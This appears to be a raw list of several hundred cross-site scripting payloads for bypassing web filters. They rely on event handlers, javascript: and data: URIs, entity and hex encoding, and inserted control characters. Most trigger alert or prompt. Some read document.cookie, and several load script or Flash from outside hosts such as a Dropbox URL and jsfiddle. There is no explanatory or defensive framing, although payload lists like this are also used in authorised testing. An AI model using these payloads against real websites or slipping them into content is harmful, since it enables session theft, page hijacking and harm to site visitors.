&#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( 
+&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe// src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a 
href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a 
href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click 
Me</a> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body 
onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet 
onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html 
onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> 
+<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div 
style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x 
\x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> 
+"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +"><img src=x onerror=javascript:alert(1)> +"><img src=x onerror=javascript:alert('1')> +"><img src=x onerror=javascript:alert("1")> +"><img src=x onerror=javascript:alert(`1`)> +"><img src=x onerror=javascript:alert(('1'))> +"><img src=x onerror=javascript:alert(("1"))> +"><img src=x onerror=javascript:alert((`1`))> +"><img src=x onerror=javascript:alert(A)> +"><img src=x onerror=javascript:alert((A))> +"><img src=x onerror=javascript:alert(('A'))> +"><img src=x onerror=javascript:alert('A')> +"><img src=x onerror=javascript:alert(("A"))> +"><img src=x onerror=javascript:alert("A")> +"><img src=x onerror=javascript:alert((`A`))> +"><img src=x onerror=javascript:alert(`A`)> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x 
onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! 